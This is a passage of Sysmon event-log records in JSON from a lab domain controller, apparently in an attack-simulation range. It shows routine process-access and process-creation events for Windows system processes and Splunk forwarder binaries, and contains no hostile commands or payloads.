{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2295,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2296,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CE-5F25-0000-0010FC170400}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CE-5F25-0000-0010FC170400}","TargetProcessId":"3856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2297,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2298,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2299,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2300,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.739\r\nProcessGuid: {A837DB8D-01CF-5F25-0000-001093190400}\r\nProcessId: 3892\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Performance monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-perfmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.739","ProcessGuid":"{A837DB8D-01CF-5F25-0000-001093190400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","FileVersion":"8.0.2","Description":"Performance monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-perfmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2301,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CF-5F25-0000-001093190400}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CF-5F25-0000-001093190400}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2302,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CF-5F25-0000-001093190400}\r\nTargetProcessId: 3892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.922","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CF-5F25-0000-001093190400}","TargetProcessId":"3892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2303,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.922\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 